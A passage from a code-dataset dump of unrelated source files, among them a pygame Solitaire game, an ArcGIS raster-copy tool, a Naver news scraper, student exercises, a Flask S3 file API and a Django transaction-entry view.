random.shuffle(cards)\n return cards\n\n #Place the piles (are reset the SuitPile win number down to 0)\n def populatePiles(self) :\n piles = []\n suit_piles = []\n SuitPile.total_cards = 0\n\n marker = 0 #Keeps track of the last card added\n x = Stillingar.margin_bil #The x_position of the pile\n y = Stillingar.margin_bil + Stillingar.mynd_upplausn[1] + Stillingar.rod_bil\n for i in range(1,8) : #Need seven main piles\n pile_name = 'Main' + str(i)\n cards = self.cards[marker : i + marker] #Each pile position also tells me how many cards it needs\n piles.append(MainPile(pile_name, (x, y), Stillingar.mynd_botn, Stillingar.tile_small_space, Stillingar.tile_large_space, cards))\n\n #The suit piles are exactly above main piles (starting on the four one)\n if i > 3 : suit_piles.append(SuitPile('Suit' + str(i - 3), (x, Stillingar.margin_bil), Stillingar.mynd_botn))\n\n #tick along x and marker\n x += piles[-1].rect.w + Stillingar.upphafs_bil\n marker = i + marker\n\n #Add the start pile \n cards = self.cards[marker : 52] #The remaining cards\n piles.append(StartPile('Start', (Stillingar.margin_bil, Stillingar.margin_bil), Stillingar.upphafs_bil, Stillingar.mynd_botn, cards))\n\n piles.extend(suit_piles) #The last four piles always must be the suit piles\n return piles\n\n #simply gets the pile that was clicked (none if no pile was clicked)\n def clickedPile(self, event) :\n for pile in self.piles :\n if pile.hasPosition(event.pos) : return pile\n\n #The basic idea of the game loop is thus :\n #If a pile is clicked, onClick() is run\n #If onClick() returns cards, this means that these cards can be moved around (while mouse is held down)\n #The moving of cards is performed by self.move_pile\n #With a double click, the down, up, and and click are read as single clicks (and still run as such)\n #The lst up click will result in onDoubleClick being called \n def gameLoop(self) :\n while True :\n if self.winCondition() : \n self.browninanMotion(2) #Move the piles around randomly if game has been won\n\n for event in pygame.event.get() :\n #Check and store if a double click occured\n if (event.type == MOUSEBUTTONUP or event.type == MOUSEBUTTONDOWN) and event.button == 1 :\n self.double_click.isDC(event)\n\n #Check if the program is quit\n if event.type == QUIT :\n pygame.quit()\n sys.exit() \n\n #Pressing r resets the program\n if event.type == KEYUP and event.key == K_r :\n self.reset()\n\n #If the game has been won, reset it with a mouse click\n if self.winCondition():\n if event.type == MOUSEBUTTONUP and event.button == 1 :\n self.reset()\n\n #Now for the main meat of the program\n else :\n if event.type == MOUSEBUTTONUP and event.button == 1 :\n #Is the user currently dragging cards (and now wants to let them go)\n #I store it as the I need to check this variable again later and the cards might have been released\n move_pile_full = self.move_pile.hasCards() \n\n if move_pile_full : #If yes\n #This finds the left most pile where the dropped cards are accepted\n selected_pile = None\n for pile in self.piles :\n if pile.validAddCards(self.move_pile.cards) : \n selected_pile = pile\n break\n\n #If a valid pile is found, drop the cards there, otherwise return the cards\n if selected_pile : self.move_pile.addToPile(selected_pile)\n else : self.move_pile.returnCards()\n\n\n\n #If the move_pile was empty and no double click, just run a simple onClick on the pile\n if not move_pile_full and not self.double_click.wasDC :\n clicked_pile = self.clickedPile(event)\n\n if clicked_pile :\n clicked_pile.onClick(event)\n\n #If mouse is held down, move those cards to the self.move_pile\n if event.type == MOUSEBUTTONDOWN and event.button == 1 :\n clicked_pile = self.clickedPile(event)\n\n if clicked_pile :\n cards_taken = clicked_pile.onClick(event)\n if cards_taken : self.move_pile.addCards(cards_taken)\n\n #if the mouse is moved, move the mouse_pile (if it has cards)\n if event.type == MOUSEMOTION :\n if self.move_pile.hasCards() : self.move_pile.movePosition(event.rel)\n\n self.screen.fill((0, 0, 0))\n self.draw()\n pygame.display.flip()\n\n\n\n\n \n \n\n #Draw is simple, just draw all the piles\n def draw(self) :\n for pile in self.piles :\n pile.draw(self.screen)\n\n self.move_pile.draw(self.screen)\n\n def start(self) :\n self.gameLoop()\n\n #When all the cards are in the suit pile\n def winCondition(self) :\n return SuitPile.total_cards == len(self.cards)\n\n #Moves the piles randomly in all directions (the length arguement specifies how hard they move)\n def browninanMotion(self, length) :\n for pile in self.piles :\n x_move = random.randint(-length, length)\n y_move = random.randint(-length, length)\n pile.movePosition((x_move, y_move))\n\n def reset(self) :\n self.cards = self.loadCards()\n self.piles = self.populatePiles()\n\nif __name__ == \"__main__\": \n g = Game()\n g.start()\n","sub_path":"Solitaire/SnorriPrufa/SolitaireGUI/src/SolitaireGui.py","file_name":"SolitaireGui.py","file_ext":"py","file_size_in_byte":29249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"534315746","text":"from base.base_tool import BaseTool\n\nfrom base import utils\nfrom base.decorators import input_tableview, input_output_table, parameter, raster_formats, pixel_type, raster_formats2\nimport arcpy\n\n\ntool_settings = {\"label\": \"Copy\",\n \"description\": \"Copy rasters...\",\n \"can_run_background\": \"True\",\n \"category\": \"Raster\"}\n\nfrom os.path import splitext, join\n\n\ndef splitext_(path):\n if len(path.split('.')) > 2:\n return path.split('.')[0], '.'.join(path.split('.')[-2:])\n return splitext(path)\n\n\nclass CopyRasterTool(BaseTool):\n \"\"\"\n \"\"\"\n\n def __init__(self):\n \"\"\"\n\n Returns:\n\n \"\"\"\n\n BaseTool.__init__(self, tool_settings)\n\n self.execution_list = [self.iterate]\n\n return\n\n @input_tableview(data_type=\"raster\")\n @parameter(\"raster_format\", \"Output Raster Format\", \"GPString\", \"Optional\", False, \"Input\", raster_formats2, None, None, \"Esri Grid\")\n @parameter(\"config_keyword\", \"Config Keyword\", \"GPString\", \"Optional\", False, \"Input\", None, None, None, None, \"Options\")\n @parameter(\"background_value\", \"Background Value\", \"GPDouble\", \"Optional\", False, \"Input\", None, None, None, None, \"Options\")\n @parameter(\"nodata_value\", \"NoData Value\", \"GPString\", \"Optional\", False, \"Input\", None, None, None, None, \"Options\")\n @parameter(\"onebit_to_eightbit\", \"1 bit to 8 bit\", \"GPString\", \"Optional\", False, \"Input\", [\"NONE\", \"OneBitTo8Bit\"], None, None, \"NONE\", \"Options\")\n @parameter(\"colormap_to_RGB\", \"Colourmap to RGB\", \"GPString\", \"Optional\", False, \"Input\", [\"NONE\", \"ColormapToRGB\"], None, None, \"NONE\", \"Options\")\n @parameter(\"pixel_type\", \"Pixel Type\", \"GPString\", \"Optional\", False, \"Input\", pixel_type, None, None, None, \"Options\")\n @parameter(\"scale_pixel_value\", \"Scale Pixel value\", \"GPString\", \"Optional\", False, \"Input\", [\"NONE\", \"ScalePixelValue\"], None, None, None, \"Options\")\n @parameter(\"RGB_to_Colormap\", \"RGB to Colourmap\", \"GPString\", \"Optional\", False, \"Input\", [\"NONE\", \"RGBToColormap\"], None, None, None, \"Options\")\n @parameter(\"transform\", \"Transform\", \"GPString\", \"Optional\", False, \"Input\", None, None, None, None, \"Options\")\n @parameter(\"bands\", \"Bands\", \"GPLong\", \"Optional\", True, \"Input\", None, None, None, None, \"Options\")\n @input_output_table(affixing=True)\n def getParameterInfo(self):\n \"\"\"\n\n Returns:\n\n \"\"\"\n\n return BaseTool.getParameterInfo(self)\n\n def iterate(self):\n \"\"\"\n\n Returns:\n\n \"\"\"\n\n self.iterate_function_on_tableview(self.copy, return_to_results=False)\n\n return\n\n def copy(self, data):\n \"\"\"\n\n Args:\n data:\n\n Returns:\n\n \"\"\"\n self.info(data)\n\n ras = data[\"raster\"]\n\n utils.validate_geodata(ras, raster=True)\n\n ws = self.output_file_workspace or self.output_workspace\n\n ras_out = utils.make_table_name(ras, ws, self.raster_format, self.output_filename_prefix, self.output_filename_suffix)\n\n self.info(\"Copying {0} -->> {1} ...\".format(ras, ras_out))\n # arcpy.CopyRaster_management(ras, ras_out, self.config_keyword, self.background_value, self.nodata_value, self.onebit_to_eightbit, self.colormap_to_RGB, self.pixel_type, self.scale_pixel_value, self.RGB_to_Colormap, self.raster_format, self.transform)\n\n if self.bands:\n for band in self.bands:\n try:\n band = \"Band_{}\".format(band)\n rasband = join(ras, band)\n ras_out = utils.make_table_name(ras, self.output_file_workspace, self.raster_format, self.output_filename_prefix, self.output_filename_suffix + \"_{}\".format(band))\n self.info(band)\n self.info(rasband)\n self.info(ras_out)\n arcpy.CopyRaster_management(rasband, ras_out, self.config_keyword, self.background_value, self.nodata_value, self.onebit_to_eightbit,\n self.colormap_to_RGB, self.pixel_type, self.scale_pixel_value, self.RGB_to_Colormap, None, self.transform)\n self.result.add_pass({\"raster\": ras_out, \"source_geodata\": rasband})\n except:\n self.result.add_fail(data)\n else:\n try:\n ras_out = utils.make_table_name(ras, self.output_file_workspace, self.raster_format, self.output_filename_prefix, self.output_filename_suffix)\n arcpy.CopyRaster_management(ras, ras_out, self.config_keyword, self.background_value, self.nodata_value, self.onebit_to_eightbit, self.colormap_to_RGB, self.pixel_type, self.scale_pixel_value, self.RGB_to_Colormap, None, self.transform)\n self.result.add_pass({\"raster\": ras_out, \"source_geodata\": ras})\n except:\n self.result.add_fail(data)\n\n # return {\"raster\": ras_out, \"source_geodata\": ras}\n\n# \"http://desktop.arcgis.com/en/arcmap/latest/tools/data-management-toolbox/copy-raster.htm\"\n# CopyRaster_management (in_raster, out_rasterdataset, {config_keyword}, {background_value}, {nodata_value}, {onebit_to_eightbit}, {colormap_to_RGB}, {pixel_type}, {scale_pixel_value}, {RGB_to_Colormap}, {format}, {transform})\n","sub_path":"tools/raster/copy.py","file_name":"copy.py","file_ext":"py","file_size_in_byte":5258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"310121848","text":"\nts = np.argmin(np.abs(h2d.g.times-h2d.g.bt))\nnpts = int(5*np.max(h2d.g.modes))\namps = np.zeros((npts)) \nrad = h2d.g.r_abl[1,ts] # 430 #ablation front radius\ncirc = 2*np.pi*rad #ablation front circumference\ncircs = np.linspace(0,circ,npts)\nrand_ph = 2*np.pi*np.random.rand(od.gs.max_rough_mode+1)\n#mode spectrum including all amps\namps = np.sum(h2d.g.rt_amp_haan[:,ts]*np.sin(2*np.pi*circs[:,np.newaxis]/h2d.g.rt_lambda[:,ts]+rand_ph),axis=1)\namps -= h2d.g.thk_shell[1,ts]\namps[amps<0] = 0\n\n\nnpts = int(5*np.max(h2d.g.modes))\namps = np.zeros((npts)) \nrad = h2d.g.r_abl[1,ts] # 430 #ablation front radius\ncirc = 2*np.pi*rad #ablation front circumference\ncircs = np.linspace(0,circ,npts)\nh2d.g.rand_ph = 2*np.pi*np.random.rand(od.gs.max_rough_mode+1)\namps = np.sum(h2d.g.rt_amp_haan[:,ts]*np.sin(2*np.pi*circs[:,np.newaxis]/h2d.g.rt_lambda[:,ts]+h2d.g.rand_ph),axis=1)\namps -= h2d.g.thk_shell[1,ts]\namps[amps<0] = 0\n\ni0 = np.where(amps==0)[0]\ndi = np.diff(i0)\ndi0 = i0[np.where(di>1)[0]]\n\nip = np.where(amps>0)[0]\ndi = np.diff(ip)\ndip = ip[np.where(di>1)[0]]\n\n\nplt.figure(21);plt.clf()\nplt.plot(circs,amps)\nplt.plot(circs[i0],amps[i0])\nplt.plot(circs[di0],amps[di0],'or')\nplt.plot(circs[dip],amps[dip],'ok')\nia = np.arange(0,len(amps),dtype=int)[di0]\nib = np.arange(0,len(amps),dtype=int)[dip]\nic= np.sort(np.append(ia,ib))\n#plt.plot(circs[ic],amps[ic],'om')\nvols=0\niall = np.arange(0,len(circs))\n#each peak is approximated as a cone \nfor n in range(len(ia)-1):\n ipk = iall[ia[n]+np.argmax(amps[ia[n]:ib[n]])]\n plt.plot(circs[ipk],amps[ipk],'oc')\n r = 0.5*(circs[ib[n]] - circs[ia[n]])\n h = amps[ipk]\n vol = np.pi*r**2*h/3\n print('ra=%2.1f,rb=%2.1f,r=%2.2f,h=%2.2f,vol=%2.4f'%(circs[ia[n]],circs[ib[n]],r,h,vol))\n vols+=vol\n#plt.title('mode=%d'%(m+1))\n#plt.pause(1e-5)\n\n#mix_area = np.trapz(y=amps,x=circs)\n#print(mix_area)\n","sub_path":"build/lib/pyh2d/mix_vol.py","file_name":"mix_vol.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"495249544","text":"from dateutil.relativedelta import relativedelta\nfrom bs4 import BeautifulSoup\nfrom itertools import count\nimport urllib.request\nimport pandas as pd\nimport datetime\nimport ssl\n\n\n\nsearchname = '맥주'\nnumbers = int(1)\n\n\nresult = []\ndateformat = \"%Y.%m.%d\"\ndateformatnso = \"%Y%m%d\"\ntoday = datetime.datetime.now()\n\n## url 오류 문자 확인 구문\ncontext = ssl._create_unverified_context()\ndef get_request_url(url,enc='utf-8'):\n response = urllib.request.urlopen(url)\n request = urllib.request.Request(url, headers={'USer-Agent':'Mozilla/5.0'})\n try:\n response = urllib.request.urlopen(request)\n if response.getcode() == 200:\n print(\"[%s] Url Request Success\" % datetime.datetime.now() + tmp + searchname+ \"(\" +str(page+1)+\")\")\n return response.read().decode(enc)\n except Exception as e:\n print(e)\n print(\"[%s] Error for URL : %s\" %(datetime.datetime.now(), url))\n return None\n\n\n\n#날짜 반복 구문(월단)\nfor num in count():\n tm = today - relativedelta(months=num+1)\n tmp = tm.strftime(dateformat)\n tmpnso = tm.strftime(dateformatnso)\n beday= today - relativedelta(months=(num+2))\n bmp = beday.strftime(dateformat)\n bmpnso = beday.strftime(dateformatnso)\n \n # 입력한 월이 카운트 num를 넘으면 break\n if num > int(numbers)-int(1):\n break\n\n #url 반복문\n for page in count():\n endpoint = 'https://search.naver.com/search.naver'\n params = '?where=news&sm=tab_jum' \n params += '&query=' + urllib.parse.quote(searchname) \n params += '&sort=1' \n params += '&ds=' + tmp \n params += '&de=' + bmp \n params += '&start=' + str(page)+str(1) \n params += '&nso=so%3Add%2Cp%3Afrom' + tmpnso + 'to' + bmpnso\n url = endpoint+params\n # print(url)\n if page > 399:\n print(\"뉴스의 개수가 4000개가 넘었습니다.\")\n break\n \n #endpage '찾을수없음' 오류 해결 <4000개일 때 \n try: \n respone = get_request_url(url)\n soupData = BeautifulSoup(respone, 'html.parser')\n table = soupData.find('ul',{'class' : 'list_news'})\n uls = table.find_all('div',{'class':\"news_area\"})\n \n #자료추출 반복문\n for store in uls:\n title = store.find('a', {'class' : 'news_tit'}).text\n yyyymm = store.find('span',{'class':\"info\"}).text\n if yyyymm.endswith('P') == True:\n continue\n elif yyyymm.endswith(str('단')) == True:\n continue\n content = store.find('a',{'class':\"api_txt_lines dsc_txt_wrap\"}).text\n \n ## 서울파이낸스는 다른 태그 명을 가지고 있다\n try:\n namees = store.find('a',{'class':'info press'}).text\n except AttributeError as e:\n break\n result.append([yyyymm]+[title]+[content]+[url])\n\n except AttributeError as e:\n break\n\ndf =pd.DataFrame(result)\ndf.to_csv(\"./data/test/네이버%s뉴스test.csv\" %(searchname))\n\n\n\n\n## 2020년 1월 1일 ~ 2021년 1월 1일\n\n\n# 맥주, 소주, 와인, 전통주, 위스키, 럼, 보드카, 막걸리, 청주, 지역소주, 고량주,\n# 발효주(막걸리랑 같이 동시 필터링) 중복값 제거\n\n## ","sub_path":"Naver_News_Project/NaverNews_Data_WebCrawling.py","file_name":"NaverNews_Data_WebCrawling.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"202235429","text":"exam_hour = int(input())\r\nexam_minutes = int(input())\r\narrival_hour = int(input())\r\narrival_minutes = int(input())\r\n\r\nexam_time = exam_hour * 60 + exam_minutes\r\narrival_time = arrival_hour * 60 + arrival_minutes\r\ndiff = arrival_time - exam_time\r\n\r\nstate = ''\r\nif diff < -30:\r\n state = 'Early'\r\nelif diff <= 0:\r\n state = 'On time'\r\nelse:\r\n state = 'Late'\r\n\r\nresult = ''\r\nif diff != 0:\r\n hours = abs(diff) // 60\r\n minutes = abs(diff) % 60\r\n\r\n if hours > 0:\r\n if diff < 0:\r\n result = f'{hours}:{minutes:02d} hours before the start'\r\n else:\r\n result = f'{hours}:{minutes:02d} hours after the start'\r\n else:\r\n if diff < 0:\r\n result = f'{minutes} minutes before the start'\r\n else:\r\n result = f'{minutes} minutes after the start'\r\n\r\nprint(f'{state}')\r\nif diff != 0:\r\n print(f'{result}')\r\n\r\n","sub_path":"Conditional_statement_Advanced/08_on_time_for_exam.py","file_name":"08_on_time_for_exam.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"373827520","text":"from tkinter import *\r\n\r\n#1. 파티\r\nyesterday = {'홍길동', '박길동', '김길동'}\r\ntoday = {'홍길동', '정길동', '이길동'}\r\n\r\nfor y in yesterday:\r\n print(y, end=' ')\r\nprint()\r\nfor t in today:\r\n print(t, end = ' ')\r\nprint()\r\nprint(\"모두 참석한 사람: \", yesterday.intersection(today))\r\nprint(\"어제 오늘 참석한 사람: \", yesterday.union(today))\r\nprint(len(yesterday.union(today)))\r\nprint()\r\n#2. 사과\r\nsentence = input(\"문장을 입력>> \")\r\nprint('전체 글자 수: ',len(sentence),'자')\r\n\r\nword = sentence.split(' ')\r\nprint('단어 수: ',len(word),'단어')\r\nprint('전체 단어:')\r\nfor w in word:\r\n print(w+' ',len(w),'글자')\r\nprint()\r\n#3. 인기투표\r\nprint(\"인기투표 시스템\")\r\nprint(\"----------------\")\r\nprint(\"1)아이유 2)BTS 3)유재석 4)종료\")\r\nprint(\"----------------\")\r\ncount = {'아이유':0, 'BTS':0, '유재석':0}\r\nwhile True:\r\n number = int(input(\"입력>> \"))\r\n if number == 1:\r\n count['아이유'] += 1\r\n elif number == 2:\r\n count['BTS'] += 1\r\n elif number == 3:\r\n count['유재석'] += 1\r\n elif number == 4:\r\n break\r\n else:\r\n continue\r\nprint(count)\r\nfor c in count:\r\n print(c+': '+str(count[c])+'표')\r\nprint()\r\n#4. 파일 입출력\r\nw = Tk()\r\nw.geometry('200x100')\r\nw.config()\r\nfruit = ['apple','banana','melon']\r\ndef file_write():\r\n file1 = open('fruit.txt','w')\r\n for f in fruit:\r\n file1.write(f+\" \")\r\ndef file_read():\r\n file2 = open('fruit.txt','r')\r\n row = file2.readline().split(' ')\r\n for r in row:\r\n print(r)\r\nfruit_label = Label(w, text='과일: apple, banana, melon')\r\nfruit_label.pack()\r\nbutton1 = Button(w,text='파일에 저장',command=file_write)\r\nbutton1.pack()\r\nbutton2 = Button(w,text='파일 읽기',command=file_read)\r\nbutton2.pack()\r\n\r\nw.mainloop()\r\n\r\n\r\n","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"180213543","text":"#WAP to create csv file and to write data\nimport csv\nf=open(\"C:/Users/amruth/Desktop/Hemraj/student.csv\",'w',newline='')\nw=csv.writer(f)\nw.writerow(['NAME','AGE','MARKS','PERCENTAGE'])\nwhile True:\n name=input(\"Enter student name :\")\n age=int(input(\"Enter student age :\"))\n marks=int(input(\"Enter student marks :\"))\n percentage=int(input(\"Enter student percentage :\"))\n w.writerow([name,age,marks,percentage])\n option=input(\"Let me know if you still want to continue[Yes|No]:\")\n if option.lower()=='no':\n break\nprint(\"Data enter sucessfully\")\n","sub_path":"CSV file.py","file_name":"CSV file.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"52870935","text":"import os\nimport shutil\n\nfrom flask import Blueprint, request\nfrom flask import current_app as app\nfrom flask_restful import Api, Resource\nfrom werkzeug.utils import secure_filename\nfrom flask import send_from_directory\n\nfrom app.services.aws_s3 import AWS_S3\nfrom app.config import get_etcd_config\n\nfile_blueprint = Blueprint(\"file\", __name__)\napi = Api(file_blueprint)\n\n\nclass FilesList(Resource):\n def get(self):\n return {\"status\": \"ok\"}, 200\n \n def post(self):\n file = request.files['file']\n filename = secure_filename(file.filename)\n dataset_name = file.content_type\n\n s3_file_path = f'{dataset_name}/{filename}'\n file.save(f'./{filename}')\n\n aws_object = AWS_S3()\n status = aws_object.upload_file(local_file_path=f'./{filename}',\n s3_file_path= s3_file_path, \n bucket_name=get_etcd_config('/data-storage/bucket_name', 'BUCKET_NAME'))\n\n try:\n os.remove(f'./{filename}')\n except:\n print('Error deleting file.') # add to log\n \n if status == True: \n return {'message' : 'File save succesfully to S3'}, 201\n else:\n return {'message' : status}, 400\n\nclass Files(Resource):\n def get(self, dataset_name):\n filename = request.args.get('filename')\n save_dir = './data'\n s3_file_path = f'{dataset_name}/{filename}'\n local_file_path = f'{save_dir}/{filename}'\n\n try:\n shutil.rmtree(save_dir) \n except:\n print (\"Removing of the directory %s failed\" % save_dir)\n\n try:\n os.mkdir(save_dir)\n except OSError:\n print (\"Creation of the directory %s failed\" % save_dir)\n\n aws_object = AWS_S3()\n status = aws_object.download_file(local_file_path=local_file_path,\n s3_file_path=s3_file_path, \n bucket_name=get_etcd_config('/data-storage/bucket_name', 'BUCKET_NAME'))\n\n if status == True: \n try:\n return send_from_directory(os.getcwd() + '/data/', filename=filename, as_attachment=True)\n except FileNotFoundError:\n return {'message' : 'File Not Found'}, 400\n else:\n return {'message' : status}, 400 \n\n \n\n\n def delete(self, dataset_name):\n filename = request.args.get('filename')\n s3_file_path = f'{dataset_name}/{filename}'\n\n aws_object = AWS_S3()\n status = aws_object.delete_file(s3_file_path=s3_file_path, \n bucket_name=get_etcd_config('/data-storage/bucket_name', 'BUCKET_NAME'))\n\n if status == True: \n return {'message' : 'File delete succesfully.'}, 200\n else:\n return {'message' : status}, 400\n\n\n\n\napi.add_resource(FilesList, \"/v1/files\")\napi.add_resource(Files, \"/v1/files/\")","sub_path":"app/api/file/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"435325634","text":"T = int(input())\n\nfor tc in range(T):\n N,K = map(int,input().split())\n\n game_pan = []\n for s in range(N):\n li = list(map(int,input().split()))\n game_pan.append(li)\n\n result = 0\n min_1 = 0\n r_daegak = 0\n l_daegak = 0\n\n for x in range((N-K)+1):\n for y in range((N - K) + 1):\n for r in range(1,K):\n r_daegak += game_pan[x+r][y+r]\n for y in range((N-K)+1,N):\n for l in range(1,K):\n l_daegak += game_pan[x-l][y-l]\n min_1 = r_daegak - l_daegak\n\n if result > min_1:\n result = min_1\n\n print('#{} {}'.format(tc+1, result))","sub_path":"Algorithm/19.03/08/서울2반김경태_문제1.py","file_name":"서울2반김경태_문제1.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"190926586","text":"\r\nimport py_common_subseq\r\nimport hashlib\r\nimport numpy as np\r\nfrom ctypes import *\r\nimport datetime\r\nfrom difflib import SequenceMatcher\r\n\r\n\r\ndef lcs(a, b):\r\n lengths = [[0 for j in range(len(b)+1)] for i in range(len(a)+1)]\r\n # row 0 and column 0 are initialized to 0 already\r\n for i, x in enumerate(a):\r\n for j, y in enumerate(b):\r\n if x == y:\r\n lengths[i+1][j+1] = lengths[i][j] + 1\r\n else:\r\n lengths[i+1][j+1] = max(lengths[i+1][j], lengths[i][j+1])\r\n # read the substring out from the matrix\r\n result = \"\"\r\n x, y = len(a), len(b)\r\n while x != 0 and y != 0:\r\n if lengths[x][y] == lengths[x-1][y]:\r\n x -= 1\r\n elif lengths[x][y] == lengths[x][y-1]:\r\n y -= 1\r\n else:\r\n assert a[x-1] == b[y-1], \"ERROR\"\r\n result = a[x-1] + result\r\n x -= 1\r\n y -= 1\r\n return result\r\n\r\ndef longestSubstring(str1,str2):\r\n # initialize SequenceMatcher object with\r\n # input string\r\n seqMatch = SequenceMatcher(None,str1,str2)\r\n\r\n # find match of longest sub-string\r\n # output will be like Match(a=0, b=0, size=5)\r\n match = seqMatch.find_longest_match(0, len(str1), 0, len(str2))\r\n\r\n # print longest substring\r\n if (match.size!=0):\r\n # print (str1[match.a: match.a + match.size])\r\n return str1[match.a: match.a + match.size]\r\n else:\r\n # print ('No longest common sub-string found')\r\n return None\r\n\r\ndef longestSubstring_length(str1,str2):\r\n # initialize SequenceMatcher object with\r\n # input string\r\n seqMatch = SequenceMatcher(None,str1,str2)\r\n\r\n # find match of longest sub-string\r\n # output will be like Match(a=0, b=0, size=5)\r\n match = seqMatch.find_longest_match(0, len(str1), 0, len(str2))\r\n\r\n # print longest substring\r\n if (match.size!=0):\r\n # print (str1[match.a: match.a + match.size])\r\n return len(str2[match.b: match.b + match.size])\r\n else:\r\n # print ('No longest common sub-string found')\r\n return 0\r\n\r\ndef timeChecker(func, str1, str2, lang, n):\r\n strstr1 = str1\r\n strstr2 = str2\r\n st1 = datetime.datetime.now()\r\n for i in range(n):\r\n x = func(strstr1, strstr2)\r\n ed1 = datetime.datetime.now()\r\n diff1 = ed1-st1\r\n print(\"\\n {} [sec]\".format(diff1))\r\n print(\" Result {} : {}\".format(lang, x))\r\n return diff1\r\n\r\ndef compare2Functions(func1, func2, str1, str2, discription, n):\r\n print(\"\\n\\n ----- {} -----\".format(discription))\r\n diff1 = timeChecker(func1, str1, str2, \"Python \", n)\r\n diff2 = timeChecker(func2, str1, str2, \"Fortran\", n)\r\n print(\"\\n Ratio {}\".format(diff1/diff2))\r\n","sub_path":"strdist.py","file_name":"strdist.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"22800427","text":"\"\"\" tahua.admin_interface.views.enter_transaction\n\n This module defines the transaction-entry views for the Tahua application's\n \"admin_interface\" package.\n\"\"\"\nimport datetime\nimport decimal\n\nimport simplejson as json\n\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.core.urlresolvers import reverse\n\nfrom tahua.models import User, Account, Transaction\nfrom tahua.lib import account_helper, utils\n\n#############################################################################\n\ndef enter_transaction(request):\n \"\"\" Respond to the \"/admin/account/transaction\" URL.\n\n We let the user enter a transaction into the system.\n \"\"\"\n if request.method == \"GET\":\n\n # We're displaying the form for the first time -> set up the default\n # values.\n\n err_msg = None\n type = \"P\"\n user_id = \"\"\n associated_user_id = \"\"\n suffix = \"\"\n other_user_id = \"\"\n other_associated_user_id = \"\"\n other_suffix = \"\"\n amount = \"\"\n description = \"\"\n\n elif request.method == \"POST\":\n\n # Respond to the user submitting our form.\n\n if request.POST.get(\"cancel\") == \"Cancel\":\n return HttpResponseRedirect(reverse(\"tahua.admin_interface.\" +\n \"views.main.main\"))\n\n err_msg = None # initially.\n\n type = request.POST['type']\n user_id = request.POST['user_id']\n associated_user_id = request.POST['associated_user_id']\n suffix = request.POST['suffix']\n other_user_id = request.POST['other_user_id']\n other_associated_user_id = request.POST['other_associated_user_id']\n other_suffix = request.POST['other_suffix']\n amount = request.POST['amount']\n description = request.POST['description']\n\n account_id = account_helper.make_account_id(user_id,\n associated_user_id,\n suffix)\n if not account_helper.is_valid_account_id(account_id):\n err_msg = \"You must enter a valid account identifier.\"\n\n if user_id not in [\"\", None]:\n try:\n user = User.objects.get(user_id=user_id)\n except User.DoesNotExist:\n err_msg = \"There is no user with ID \" + user_id\n\n if associated_user_id not in [\"\", None]:\n try:\n user = User.objects.get(user_id=associated_user_id)\n except User.DoesNotExist:\n err_msg = \"There is no user with ID \" + associated_user_id\n\n if err_msg == None:\n try:\n dec_amount = decimal.Decimal(amount)\n except decimal.InvalidOperation:\n err_msg = \"Invalid amount.\"\n\n if err_msg == None:\n if type not in [Transaction.TYPE_DEPOSIT,\n Transaction.TYPE_WITHDRAWAL,\n Transaction.TYPE_PAYMENT,\n Transaction.TYPE_REVERSAL,\n Transaction.TYPE_ADJUSTMENT]:\n err_msg = \"Please select a valid transaction type.\"\n\n if err_msg == None:\n if type == Transaction.TYPE_PAYMENT:\n other_account_id = \\\n account_helper.make_account_id(other_user_id,\n other_associated_user_id,\n other_suffix)\n if not account_helper.is_valid_account_id(other_account_id):\n err_msg = \"You must enter a valid other account identifier.\"\n\n # If the entered data was accepted, enter the transaction into the\n # system.\n\n if err_msg == None:\n account = account_helper.get_or_create_account(account_id)\n if type == Transaction.TYPE_PAYMENT:\n other_account = \\\n account_helper.get_or_create_account(other_account_id)\n else:\n other_account = None\n\n meta_data = {}\n if description != \"\":\n meta_data['description'] = description\n\n if type == Transaction.TYPE_PAYMENT:\n dec_amount = -dec_amount # Deduct amount from source account.\n\n transaction = Transaction()\n transaction.account = account\n transaction.other_account = other_account\n transaction.timestamp = datetime.datetime.now()\n transaction.type = type\n transaction.amount = dec_amount\n transaction.metadata = json.dumps(meta_data)\n transaction.save()\n\n # If the user is entering a payment, enter the reverse transaction\n # at the same time.\n\n if type == Transaction.TYPE_PAYMENT:\n transaction = Transaction()\n transaction.account = other_account\n transaction.other_account = account\n transaction.timestamp = datetime.datetime.now()\n transaction.type = type\n transaction.amount = -dec_amount\n transaction.metadata = json.dumps(meta_data)\n transaction.save()\n\n # Finally, tell the user about the entered transaction.\n\n if type == Transaction.TYPE_PAYMENT:\n msg = utils.formatDecimalAsMoney(-dec_amount) \\\n + \" has been transferred from \" + account.describe() \\\n + \" to \" + other_account.describe() + \".\"\n else:\n msg = 'A transaction of type \"' + transaction.type_to_string() \\\n + '\" to the value of ' \\\n + utils.formatDecimalAsMoney(dec_amount) \\\n + ' has been entered against the ' \\\n + account.describe()\n\n return render_to_response(\"admin_interface/\" +\n \"transaction_entered.html\",\n {'msg' : msg},\n context_instance=RequestContext(request))\n\n # If we get here, display the form to the user.\n\n return render_to_response(\"admin_interface/enter_transaction.html\",\n {'err_msg' : err_msg,\n 'type' : type,\n 'user_id' : user_id,\n 'associated_user_id' : associated_user_id,\n 'suffix' : suffix,\n 'other_user_id' : other_user_id,\n 'other_associated_user_id' :\n 